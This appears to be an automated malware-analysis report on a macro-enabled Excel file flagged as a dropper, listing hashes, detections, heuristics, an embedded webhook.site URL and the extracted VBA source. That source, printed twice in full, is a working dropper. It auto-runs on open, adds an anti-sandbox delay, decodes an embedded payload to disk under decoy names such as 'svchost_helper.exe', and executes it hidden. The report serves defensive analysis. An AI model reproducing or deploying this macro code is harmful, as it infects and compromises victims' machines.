Office (OOXML) / .XLSX malware analysis — malicious · cf5132bc98855c4a

MALICIOUS

Office (OOXML) / .XLSX

56.4 KB Created: 2026-03-31 07:21:21 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2026-06-18

MD5: 8bd0ce08991896fa242e455631b2bb89 SHA-1: 71f2f3161bfc5bd937f17c1a8d649ac37ba6e1b6 SHA-256: cf5132bc98855c4aab109293282ede0c05f070b375c9c62e1efddc41b653acd2

468 Risk Score

Heuristics 13

ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
VBA project inside OOXML medium 9 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

        Case 0 ' Method A: Standard WScript.Shell
            Dim shell As Object
            Set shell = CreateObject("WScript.Shell")

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

            Dim shell As Object
            Set shell = CreateObject("WScript.Shell")
            shell.Run fullPath, 0, False

VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Matched line in script
```
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

            Dim wmi As Object
            Set wmi = GetObject("winmgmts:root\cimv2")
            wmi.Get("Win32_Process").Create fullPath, Null, Null, Null

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
    RunDropper
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    RunDropper
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    Select Case pathChoice
        Case 0: dropPath = Environ("TEMP")
        Case 1: dropPath = Environ("APPDATA")

Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://webhook.site/a72d8905-b15f-4e95-9a8f-5e4bb7dc9b3d In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/windows/2004/02/mit/task^In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	6354 bytes
SHA-256: `01644b3bf60b0b30175eff405741fca650128a5ac991bed7cd9f7d6d1065f967`
Preview script First 1,000 lines of the extracted script Sub AutoOpen() RunDropper End Sub Sub Workbook_Open() RunDropper End Sub Sub RunDropper() On Error Resume Next Dim xmlPart As Object Dim base64String As String Dim dropPath As String Dim exeName As String Dim fullPath As String Dim binaryData() As Byte Dim fNum As Integer Dim hostObj As Object ' Initialize Randomizer Randomize ' 1. Identify the Correct Host Object Select Case Application.Name Case "Microsoft Word" Set hostObj = ActiveDocument Case "Microsoft Excel" Set hostObj = ActiveWorkbook Case "Microsoft PowerPoint" Set hostObj = ActivePresentation End Select If hostObj Is Nothing Then Exit Sub ' 2. Locate the payload in CustomXMLParts For Each xmlPart In hostObj.CustomXMLParts If xmlPart.DocumentElement.BaseName = "payload" Then base64String = xmlPart.DocumentElement.Text Exit For End If Next xmlPart If base64String = "" Then Exit Sub ' 3. ANTI-SANDBOX DELAY (0 to 4 seconds) Dim start As Single start = Timer Do While Timer < start + Int(Rnd * 5) DoEvents Loop ' 4. MORPHIC DROP PATH Dim pathChoice As Integer pathChoice = Int(Rnd * 4) Select Case pathChoice Case 0: dropPath = Environ("TEMP") Case 1: dropPath = Environ("APPDATA") Case 2: dropPath = Environ("LOCALAPPDATA") Case 3: dropPath = Environ("PUBLIC") End Select If dropPath = "" Then dropPath = Environ("TEMP") ' 5. DECOY NAME SELECTION Dim names As Variant names = Array("win_update_svc.exe", "chrome_patch_05.exe", "trusted_installer_patch.exe", _ "system_diag_fix.exe", "office_repair_kit.exe", "nvidia_driver_updater.exe", _ "svchost_helper.exe", "defender_sig_update.exe") exeName = names(Int(Rnd * (UBound(names) + 1))) fullPath = dropPath & "\" & exeName ' 6. DECODE BASE64 Dim xmlDoc As Object Dim xmlNode As Object Set xmlDoc = CreateObject("MSXML2.DOMDocument") Set xmlNode = xmlDoc.createElement("b64") xmlNode.DataType = "bin.base64" xmlNode.Text = base64String binaryData = xmlNode.nodeTypedValue ' 7. WRITE TO DISK fNum = FreeFile Open fullPath For Binary Access Write As #fNum Put #fNum, , binaryData Close #fNum ' 8. MORPHIC EXECUTION Dim execChoice As Integer execChoice = Int(Rnd * 3) ' 3 methods Select Case execChoice Case 0 ' Method A: Standard WScript.Shell Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run fullPath, 0, False Case 1 ' Method B: Shell.Application.ShellExecute Dim sa As Object Set sa = CreateObject("Shell.Application") sa.ShellExecute fullPath, "", "", "open", 0 Case 2 ' Method C: WMI (Win32_Process.Create) Dim wmi As Object Set wmi = GetObject("winmgmts:root\cimv2") wmi.Get("Win32_Process").Create fullPath, Null, Null, Null End Select End Sub Sub AutoOpen() RunDropper End Sub Sub Workbook_Open() RunDropper End Sub Sub RunDropper() On Error Resume Next Dim xmlPart As Object Dim base64String As String Dim dropPath As String Dim exeName As String Dim fullPath As String Dim binaryData() As Byte Dim fNum As Integer Dim hostObj As Object ' Initialize Randomizer Randomize ' 1. Identify the Correct Host Object Select Case Application.Name Case "Microsoft Word" Set hostObj = ActiveDocument Case "Microsoft Excel" Set hostObj = ActiveWorkbook Case "Microsoft PowerPoint" Set hostObj = ActivePresentation End Select If hostObj Is Nothing Then Exit Sub ' 2. Locate the payload in CustomXMLParts For Each xmlPart In hostObj.CustomXMLParts If xmlPart.DocumentElement.BaseName = "payload" Then base64String = xmlPart.DocumentElement.Text Exit For End If Next xmlPart If base64String = "" Then Exit Sub ' 3. ANTI-SANDBOX DELAY (0 to 4 seconds) Dim start As Single start = Timer Do While Timer < start + Int(Rnd * 5) DoEvents Loop ' 4. MORPHIC DROP PATH Dim pathChoice As Integer pathChoice = Int(Rnd * 4) Select Case pathChoice Case 0: dropPath = Environ("TEMP") Case 1: dropPath = Environ("APPDATA") Case 2: dropPath = Environ("LOCALAPPDATA") Case 3: dropPath = Environ("PUBLIC") End Select If dropPath = "" Then dropPath = Environ("TEMP") ' 5. DECOY NAME SELECTION Dim names As Variant names = Array("win_update_svc.exe", "chrome_patch_05.exe", "trusted_installer_patch.exe", _ "system_diag_fix.exe", "office_repair_kit.exe", "nvidia_driver_updater.exe", _ "svchost_helper.exe", "defender_sig_update.exe") exeName = names(Int(Rnd * (UBound(names) + 1))) fullPath = dropPath & "\" & exeName ' 6. DECODE BASE64 Dim xmlDoc As Object Dim xmlNode As Object Set xmlDoc = CreateObject("MSXML2.DOMDocument") Set xmlNode = xmlDoc.createElement("b64") xmlNode.DataType = "bin.base64" xmlNode.Text = base64String binaryData = xmlNode.nodeTypedValue ' 7. WRITE TO DISK fNum = FreeFile Open fullPath For Binary Access Write As #fNum Put #fNum, , binaryData Close #fNum ' 8. MORPHIC EXECUTION Dim execChoice As Integer execChoice = Int(Rnd * 3) ' 3 methods Select Case execChoice Case 0 ' Method A: Standard WScript.Shell Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run fullPath, 0, False Case 1 ' Method B: Shell.Application.ShellExecute Dim sa As Object Set sa = CreateObject("Shell.Application") sa.ShellExecute fullPath, "", "", "open", 0 Case 2 ' Method C: WMI (Win32_Process.Create) Dim wmi As Object Set wmi = GetObject("winmgmts:root\cimv2") wmi.Get("Win32_Process").Create fullPath, Null, Null, Null End Select End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	18944 bytes
SHA-256: `7c95f0d93f64b19b222d7310df3265853bf5dccfc99d2b1754c0050ba01edee7`
Detection ClamAV: Xls.Dropper.Generic-6595971-0 Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.